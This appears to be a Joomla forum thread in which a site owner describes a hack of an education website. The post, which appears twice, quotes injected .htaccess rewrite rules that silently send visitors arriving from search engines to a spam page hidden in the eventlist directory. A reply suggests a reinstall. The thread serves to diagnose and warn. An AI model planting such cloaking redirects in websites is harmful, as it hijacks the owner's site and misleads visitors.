Joomexplorer and Events list security issue - hacked .htaccess file - Joomla! Forum - community, help and support
hi everyone,
i have had guess unusually unique experience wanted share fellow joomla developers.
my setup:
godaddy shared hosting
joomla 1.012 stable
php 4.3.11
i'm running normal joomla security safeguards recommended site.
we have active education website. 2 weeks ago got call user told me when went google, or search engine, , looked our name, clicked on link, arrived @ our page , our address, page had been turned black weird blog links on it.
i figured impossible, checked out, , sure enough, going our domain name search engine:
http://www.asdasdf.com
would lead strange index page fake blog anonymous dude named john. fake , not redirection in dns host. obvious hack of sort.
folks @ godaddy told me meta-refresh on index page , send somewhere else, file in directory, figured that's not solving problem, , joomla site pretty useless since it's set @ root index.php. had never seen problem, , don't blame them either, have joomla site lot of components , hardcoded crap of own. hack component or else.
so started taking things off, either uninstalling them, changing names or unpublishing them. discovered problem .htaccess file. had grown 7k 93k... pretty darn big little text file. suspicious, checked out , sure enough had amazing code in - upon list of search engine referals - redirect user fake blog page yet keep domain name preserved... below code inside .htaccess file:
# a0b4df006e02184c60dbf503e71c87ad
rewriteengine on
rewritecond %{http_referer} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [nc]
rewritecond %{http_referer} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
rewritecond %{http_referer} \=[^&]+(%3a|%22)
rewritecond %{time_sec} <54
rewriterule ^.*$ /images/eventlist/events/icewoj/ex3/t.htm [l]
# a995d2cc661fa72452472e9554b5520c
-----------------------quite ingenious -------------------------
removing code makes normal... however, hack came back... within 24 hours problem again...
anyhow, removed joomxplorer, has root access files, , has solved repeating problem of getting hacked... joomxplorer had been used put fake page deep inside events list directory... had changed passwords , didn't help, had remove joomxplorer component. so, looooove joomxplorer, can't use right since i'm being targeted repeating malicious hack... if knows please post here.
dave
i have had guess unusually unique experience wanted share fellow joomla developers.
my setup:
godaddy shared hosting
joomla 1.012 stable
php 4.3.11
i'm running normal joomla security safeguards recommended site.
we have active education website. 2 weeks ago got call user told me when went google, or search engine, , looked our name, clicked on link, arrived @ our page , our address, page had been turned black weird blog links on it.
i figured impossible, checked out, , sure enough, going our domain name search engine:
http://www.asdasdf.com
would lead strange index page fake blog anonymous dude named john. fake , not redirection in dns host. obvious hack of sort.
folks @ godaddy told me meta-refresh on index page , send somewhere else, file in directory, figured that's not solving problem, , joomla site pretty useless since it's set @ root index.php. had never seen problem, , don't blame them either, have joomla site lot of components , hardcoded crap of own. hack component or else.
so started taking things off, either uninstalling them, changing names or unpublishing them. discovered problem .htaccess file. had grown 7k 93k... pretty darn big little text file. suspicious, checked out , sure enough had amazing code in - upon list of search engine referals - redirect user fake blog page yet keep domain name preserved... below code inside .htaccess file:
# a0b4df006e02184c60dbf503e71c87ad
rewriteengine on
rewritecond %{http_referer} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [nc]
rewritecond %{http_referer} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
rewritecond %{http_referer} \=[^&]+(%3a|%22)
rewritecond %{time_sec} <54
rewriterule ^.*$ /images/eventlist/events/icewoj/ex3/t.htm [l]
# a995d2cc661fa72452472e9554b5520c
-----------------------quite ingenious -------------------------
removing code makes normal... however, hack came back... within 24 hours problem again...
anyhow, removed joomxplorer, has root access files, , has solved repeating problem of getting hacked... joomxplorer had been used put fake page deep inside events list directory... had changed passwords , didn't help, had remove joomxplorer component. so, looooove joomxplorer, can't use right since i'm being targeted repeating malicious hack... if knows please post here.
dave
i got hacked , hacker posted info in eventlist. perhaps there bug here. i'm not using joomexplorer maybe thats not it. using expose gallery , had secuity issues in past. suggest backup, save images , fo fresh install latest release of joomla ver 1.014. let me know if eventlist problem since common denominator between or other solution.
good luck
good luck
Comments
Post a Comment